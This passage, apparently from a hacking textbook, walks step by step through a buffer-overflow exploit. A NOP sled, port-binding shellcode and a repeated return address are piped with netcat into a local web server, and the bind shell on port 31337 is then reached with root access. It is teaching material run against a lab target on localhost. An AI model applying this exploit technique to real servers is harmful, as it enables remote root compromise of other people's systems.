Graphics Programs Reference
In-Depth Information
Even though the remote shell doesn't display a prompt, it still accepts
commands and returns the output over the network.
A program like netcat can be used for many other things. It's designed to
work like a console program, allowing standard input and output to be piped
and redirected. Using netcat and the port-binding shellcode in a file, the same
exploit can be carried out on the command line.
reader@hacking:~/booksrc $ wc -c portbinding_shellcode
92 portbinding_shellcode
reader@hacking:~/booksrc $ echo $((540+4 - 300 - 92))
152
reader@hacking:~/booksrc $ echo $((152 / 4))
38
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x300';
> cat portbinding_shellcode
> perl -e 'print "\x88\xf6\xff\xbf"x38 . \r\n"')
jfX
1
CRj j
jfXC
RfhzifS
j QV
fCCSV
fCRRV
j Y
? Iy
Rh//shh/bin
R
S
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x300'; cat portbinding_shellcode;
perl -e 'print "\x88\xf6\xff\xbf"x38 . "\r\n"') | nc -v -w1 127.0.0.1 80
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ nc -v 127.0.0.1 31337
localhost [127.0.0.1] 31337 (?) open
whoami
root
In the output above, first the length of the port-binding shellcode is
shown to be 92 bytes. The return address is found 540 bytes from the start of
the buffer, so with a 300-byte NOP sled and 92 bytes of shellcode, there are
152 bytes to the return address overwrite. This means that if the target return
address is repeated 38 times at the end of the buffer, the last one should do
the overwrite. Finally, the buffer is terminated with
'\r\n'
. The commands
that build the buffer are grouped with parentheses to pipe the buffer into
netcat. netcat connects to the tinyweb program and sends the buffer. After
the shellcode runs, netcat needs to be broken out of by pressing
CTRL
-C,
since the original socket connection is still open. Then, netcat is used again
to connect to the shell bound on port 31337.
